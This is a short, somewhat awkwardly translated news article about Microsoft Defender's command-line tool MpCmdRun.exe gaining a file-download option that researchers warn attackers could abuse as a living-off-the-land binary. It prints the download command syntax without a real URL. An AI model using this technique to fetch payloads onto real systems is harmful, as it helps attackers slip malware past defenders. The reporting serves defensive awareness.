Microsoft Defender is back in the media spotlight after it is not allowed to be disabled by the Windows registry. Microsoft recently added a feature to Defender, but security experts say hackers can use it to download malicious programs.
In the 4.18.2007.9 or 4.18.2009.9 version of the Microsoft Defender app, Microsoft added the ability to download files from the command line. How to use it is.
MpCmdRun.exe -DownloadFile -url -path (path_to_save_file)
Although the feature itself is not vulnerable, it runs a run script that starts the command line to import more files from the Internet, using native living-off-the-land (LOLBIN) files. Adding this feature to Windows Defender means that there is one more app that administrators must pay attention to, and another app that hackers can take advantage of.
Askar, a security researcher, says these changes to microsoft Defender-driven command-line tools could be abused by attackers. In other words, hackers can abuse these binary files and download any file from the Internet, including malware.
This also means that users will be able to download any files from the Internet using Microsoft Defender itself. This is unlikely to be a significant security vulnerability because Windows Defender still checks files after you complete the download using the command-line tools.